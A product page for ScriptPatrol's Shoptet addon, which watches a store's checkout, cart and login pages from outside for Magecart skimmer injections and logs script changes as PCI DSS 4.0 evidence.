Shoptet is the leading e-commerce platform in Czech Republic and Slovakia. Every Shoptet store has a checkout, a cart, and a login page — the exact pages attackers target with Magecart skimmers and supply-chain JavaScript injections. ScriptPatrol is building a dedicated Shoptet addon: OAuth-based onboarding, security monitoring from outside the storefront, zero JavaScript injected into your customer pages. The addon is currently in early-access pilot — catalog listing with Shoptet is under review and we onboard pilot stores directly.
The Problem
A Magecart attack injects malicious JavaScript onto your checkout page. It silently copies card numbers, names, and CVVs as customers type them — before the payment gateway ever sees the data. Most merchants discover the breach weeks later, via a customer complaint or a bank report.
The defense is continuous monitoring: scan your checkout, cart, and login pages on a schedule, compare the scripts against a known-good baseline, and alert the moment anything changes. Simple in principle, but until now it required manual configuration and a developer to set up correctly.
Without the addon (15–30 minutes of setup):
- Create a ScriptPatrol account
- Add your domain and wait for the discovery scan
- Manually verify which discovered paths are the right ones
- Identify which pages are security-critical
- Configure monitoring schedule and alerts
- Remember to update the config when your store changes
With the Shoptet addon (once installed, zero configuration):
- Install the addon (during pilot: through direct onboarding with us)
- Shoptet performs the OAuth handshake — no API keys to paste
- Your ScriptPatrol account is auto-provisioned from your store's contact email
- Open the addon panel in Shoptet admin to see monitoring status
How the Addon Works
The addon is a hosted application that integrates with Shoptet via the official OAuth 2.0 addon API. It appears directly inside your Shoptet administration panel — no separate login, no external dashboard to manage. Installation follows the standard Shoptet addon flow.
Phase 1: Secure OAuth Handshake
When you install the addon, Shoptet sends a single-use OAuth code to our install endpoint. We exchange it server-to-server for an access token, which is stored encrypted at rest (AES-256-GCM). The OAuth scope is api, and the addon only reads the eshopId, store URL, and contact email — never orders, customers, or payment data. Your ScriptPatrol account is auto-created from this metadata; you never paste an API key.
Phase 2: Automatic Page Discovery
The addon knows Shoptet's URL patterns. It automatically registers the security-critical pages for your store: /pokladna, /kosik, /a/prihlaseni, and /a/ucet. No manual configuration of page paths is needed — the addon knows where Magecart would target your store.
Phase 3: Continuous Monitoring
Once the baseline is created, ScriptPatrol scans your critical pages on a continuous schedule. Any change to a JavaScript file — any new script added, any inline code modified, any security header changed — triggers an alert with the exact diff, the affected script, and an AI-powered risk assessment. Every event is timestamped and logged for your audit trail.
What You Get After Installing
The addon is the connection bridge. Once connected, ScriptPatrol monitors your entire JavaScript and security layer:
Checkout & payment page monitoring
Your /pokladna is watched on every scan cycle. Any script addition or modification triggers an immediate alert.
Cart, login, and account pages
Full coverage of /kosik, /a/prihlaseni, and /a/ucet — the complete customer journey from browse to purchase.
Security headers
CSP, HSTS, X-Frame-Options, and other headers are tracked alongside scripts. A weakened CSP is often the first sign of a compromise.
All scripts — inline, external, third-party
Every script tag on the page is captured and hashed. Third-party analytics, payment widgets, and chat plugins are all monitored.
Risk score with an AI explanation on every detected change
Not all changes are threats. ScriptPatrol distinguishes a routine analytics update from a skimmer injection — so you get fewer alerts, on the things that matter.
SHA-256 script inventory for PCI DSS 4.0
Every script baseline is stored with its integrity hash. This is the evidence PCI DSS 4.0 requirements 6.4.3 and 11.6.1 ask for.
Security Architecture
The addon was built with a security-first approach and audited against Shoptet's addon security requirements and OWASP Top 10.
API Key Security
Keys are encrypted at rest with AES-256-GCM. Server-side hashing with timing-safe comparison prevents both database leaks and timing attacks.
Webhook Integrity
Every webhook from Shoptet is verified via HMAC signature before processing. Replayed or forged uninstall events are rejected.
TLS Enforcement
All API communication uses HTTPS. Certificate verification is always enabled. API keys are never sent as URL parameters.
Error Handling
No stack traces or internal paths are ever exposed to the admin UI. All errors are mapped to user-friendly messages with actionable guidance.
PCI DSS 4.0 Evidence
Beyond catching attacks, ScriptPatrol produces the script-inventory and change-detection evidence that PCI DSS 4.0 requires. Merchants who file SAQ A-EP or SAQ D need this for requirements 6.4.3 and 11.6.1.
Requirement 6.4.3 — Script Inventory and Authorization
- Complete baseline of all scripts on each payment page
- SHA-256 hashes for integrity verification
- Audit-ready evidence packs you can export
Requirement 11.6.1 — Change and Tamper Detection
- Continuous scanning on a configurable schedule
- Alerting on any script addition, removal, or modification
- AI-powered severity classification on every change
Why Not a JavaScript Tag?
Some security vendors ask you to embed their JavaScript on your pages. This approach has a fundamental problem: the monitoring script becomes part of the attack surface. An attacker who controls the page can disable it. It only runs when a customer visits. And it adds another third-party script to the very pages you are trying to protect.
The ScriptPatrol addon takes a different approach. It configures the connection between your store and our external monitoring infrastructure — but it never injects any JavaScript into your storefront. Your checkout loads exactly as before. Monitoring happens externally, independently of customer traffic, making it tamper-proof by design.
| JavaScript Tag | ScriptPatrol Addon | |
|---|---|---|
| Performance impact | Adds load time to every page view | Zero JS injected into your storefront |
| Tamper resistance | Can be disabled by attackers | Cannot be tampered with from the storefront |
| Monitoring coverage | Only when customers visit | Scheduled, independent of traffic |
| Attack surface | Adds another third-party script | No additional scripts on your pages |
| Setup | Paste code into your theme | Install addon — OAuth handshake, no keys to paste |
Getting Started
Join the pilot waitlist
Sign up at scriptpatrol.com and tell us you run a Shoptet store. During the pilot we onboard stores directly while catalog listing with Shoptet is under review.
Install the addon
We send the addon install link. Shoptet performs the OAuth handshake against our endpoint — single-use code exchanged server-to-server, no manual configuration.
Account auto-created
Your ScriptPatrol account is auto-provisioned from the store contact email Shoptet sends with OAuth. No API keys to copy, paste, or store.
Monitoring starts automatically
ScriptPatrol creates baselines for your payment pages (/pokladna, /kosik, /a/prihlaseni, /a/ucet) and begins continuous monitoring. You get an alert within minutes of each scan that finds a change.
Zero configuration after install. No code changes, no theme modifications, no API keys to manage.
Client-side security should not require a development team
If you run a Shoptet store, the addon brings continuous script monitoring without developers, configuration, or maintenance. The ScriptPatrol addon handles the technical integration so you can focus on what matters — knowing that any unauthorized change to your payment pages is caught fast.
The addon is in early-access pilot — join via the integrations page. Catalog listing with Shoptet is under review. Support for WooCommerce, PrestaShop, and other platforms is in development.